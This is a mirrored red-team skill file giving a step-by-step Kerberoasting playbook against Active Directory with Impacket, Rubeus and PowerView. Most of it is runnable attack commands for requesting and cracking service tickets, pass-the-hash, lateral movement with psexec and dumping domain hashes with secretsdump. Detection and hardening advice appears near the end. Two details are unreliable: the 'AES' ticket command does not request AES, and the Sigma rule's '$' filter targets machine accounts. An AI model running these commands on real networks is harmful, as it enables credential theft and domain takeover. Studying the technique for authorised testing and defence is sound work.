mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-19 14:09:40 +03:00
195 lines
6.6 KiB
Markdown
195 lines
6.6 KiB
Markdown
---
|
|
name: exploiting-kerberoasting-with-impacket
|
|
description: Perform Kerberoasting attacks using Impacket's GetUserSPNs to extract and crack Kerberos TGS tickets for Active Directory service accounts.
|
|
domain: cybersecurity
|
|
subdomain: red-teaming
|
|
tags: [kerberoasting, impacket, active-directory, credential-access, kerberos, t1558-003, service-accounts]
|
|
version: "1.0"
|
|
author: mahipal
|
|
license: MIT
|
|
---
|
|
|
|
# Exploiting Kerberoasting with Impacket
|
|
|
|
## Overview
|
|
|
|
Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's NTLM hash (RC4 or AES), enabling offline brute-force cracking. Impacket's `GetUserSPNs.py` is the standard tool for Linux-based Kerberoasting attacks.
|
|
|
|
## Prerequisites
|
|
|
|
- Valid domain credentials (any domain user can request TGS tickets)
|
|
- Network access to a Domain Controller (TCP/88 Kerberos, TCP/389 LDAP)
|
|
- Impacket installed (`pip install impacket`)
|
|
- Hashcat or John the Ripper for offline cracking
|
|
- Wordlist (e.g., rockyou.txt, SecLists)
|
|
|
|
## MITRE ATT&CK Mapping
|
|
|
|
| Technique ID | Name | Tactic |
|
|
|---|---|---|
|
|
| T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | Credential Access |
|
|
| T1087.002 | Account Discovery: Domain Account | Discovery |
|
|
| T1110.002 | Brute Force: Password Cracking | Credential Access |
|
|
|
|
## Step 1: Enumerate Kerberoastable Accounts
|
|
|
|
```bash
|
|
# List all user accounts with SPNs (without requesting tickets)
|
|
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1
|
|
|
|
# Output example:
|
|
# ServicePrincipalName Name MemberOf PasswordLastSet
|
|
# ---------------------------- ---------- -------------------------------- -------------------
|
|
# MSSQLSvc/SQL01.corp.local svc_sql CN=Domain Admins,CN=Users,... 2023-01-15 10:30:22
|
|
# HTTP/web01.corp.local svc_web CN=Web Admins,CN=Users,... 2024-03-20 14:15:00
|
|
# HOST/backup01.corp.local svc_backup CN=Backup Operators,CN=Users,... 2022-06-01 08:45:10
|
|
```
|
|
|
|
## Step 2: Request TGS Tickets
|
|
|
|
```bash
|
|
# Request TGS tickets for all Kerberoastable accounts
|
|
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
|
|
|
|
# Request ticket for a specific SPN
|
|
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
|
|
-request-user svc_sql
|
|
|
|
# Output format (hashcat-compatible):
|
|
# $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/SQL01.corp.local*$abc123...
|
|
|
|
# Save to file for cracking
|
|
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
|
|
-request -outputfile kerberoast_hashes.txt
|
|
|
|
# Using NTLM hash instead of password (Pass-the-Hash)
|
|
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
|
|
-dc-ip 10.10.10.1 -request -outputfile hashes.txt
|
|
|
|
# Request AES tickets (if available)
|
|
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
|
|
-request -outputfile hashes.txt
|
|
```
|
|
|
|
## Step 3: Crack TGS Tickets Offline
|
|
|
|
```bash
|
|
# Hashcat - RC4 encrypted tickets (mode 13100)
|
|
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
|
|
--rules-file /usr/share/hashcat/rules/best64.rule
|
|
|
|
# Hashcat - AES-256 encrypted tickets (mode 19700)
|
|
hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
|
|
# John the Ripper
|
|
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
|
|
|
|
# Check results
|
|
hashcat -m 13100 kerberoast_hashes.txt --show
|
|
# $krb5tgs$23$*svc_sql$CORP.LOCAL$...*$...:Summer2024!
|
|
```
|
|
|
|
## Step 4: Validate and Use Cracked Credentials
|
|
|
|
```bash
|
|
# Verify cracked credentials
|
|
crackmapexec smb 10.10.10.1 -u svc_sql -p 'Summer2024!' -d corp.local
|
|
|
|
# Check for local admin access
|
|
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'Summer2024!' -d corp.local --local-auth
|
|
|
|
# Use credentials for lateral movement
|
|
psexec.py corp.local/svc_sql:'Summer2024!'@SQL01.corp.local
|
|
|
|
# If service account is Domain Admin
|
|
secretsdump.py corp.local/svc_sql:'Summer2024!'@10.10.10.1 -just-dc-ntlm
|
|
```
|
|
|
|
## Alternative Tools
|
|
|
|
### Rubeus (Windows)
|
|
|
|
```powershell
|
|
# Kerberoast all accounts
|
|
.\Rubeus.exe kerberoast /outfile:hashes.txt
|
|
|
|
# Target specific user
|
|
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt
|
|
|
|
# Request RC4-only tickets (easier to crack)
|
|
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt
|
|
|
|
# Kerberoast with AES
|
|
.\Rubeus.exe kerberoast /aes /outfile:hashes.txt
|
|
```
|
|
|
|
### PowerView (PowerShell)
|
|
|
|
```powershell
|
|
Import-Module .\PowerView.ps1
|
|
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt
|
|
```
|
|
|
|
## Targeted Kerberoasting
|
|
|
|
High-value targets for Kerberoasting:
|
|
|
|
| Account Type | Why | Risk |
|
|
|---|---|---|
|
|
| Service accounts in Domain Admins | Direct path to domain compromise | Critical |
|
|
| SQL service accounts (MSSQLSvc) | Often have excessive privileges | High |
|
|
| Exchange service accounts | Access to all email | High |
|
|
| Accounts with AdminCount=1 | Previously/currently privileged | High |
|
|
| Accounts with old passwords | More likely to use weak passwords | Medium |
|
|
|
|
## Detection
|
|
|
|
### Windows Event Logs
|
|
|
|
```
|
|
Event ID 4769 - Kerberos Service Ticket Request
|
|
- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected
|
|
- Monitor for: Single user requesting many TGS tickets in short period
|
|
- Monitor for: Service ticket requests from unusual source IPs
|
|
```
|
|
|
|
### Sigma Rule
|
|
|
|
```yaml
|
|
title: Potential Kerberoasting Activity
|
|
status: stable
|
|
logsource:
|
|
product: windows
|
|
service: security
|
|
detection:
|
|
selection:
|
|
EventID: 4769
|
|
TicketEncryptionType: '0x17' # RC4
|
|
ServiceName|endswith: '$'
|
|
filter:
|
|
ServiceName: 'krbtgt'
|
|
condition: selection and not filter
|
|
level: medium
|
|
tags:
|
|
- attack.credential_access
|
|
- attack.t1558.003
|
|
```
|
|
|
|
## Defensive Recommendations
|
|
|
|
1. **Use Group Managed Service Accounts (gMSA)** - 240-character random passwords, auto-rotated
|
|
2. **Set strong passwords (25+ chars)** on all service accounts
|
|
3. **Enable AES-only encryption** - Disable RC4 via GPO
|
|
4. **Monitor Event ID 4769** for RC4 TGS requests
|
|
5. **Implement Managed Service Accounts** where gMSA is not feasible
|
|
6. **Regular audits** - Run BloodHound to identify Kerberoastable accounts
|
|
7. **Protected Users group** - Add sensitive service accounts
|
|
8. **Honeypot SPNs** - Create decoy accounts with SPNs to detect attacks
|
|
|
|
## References
|
|
|
|
- MITRE ATT&CK T1558.003: https://attack.mitre.org/techniques/T1558/003/
|
|
- Impacket: https://github.com/fortra/impacket
|
|
- Harmj0y's Kerberoasting Revisited: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
|
|
- Detection Strategy DET0157: https://attack.mitre.org/detectionstrategies/DET0157/
|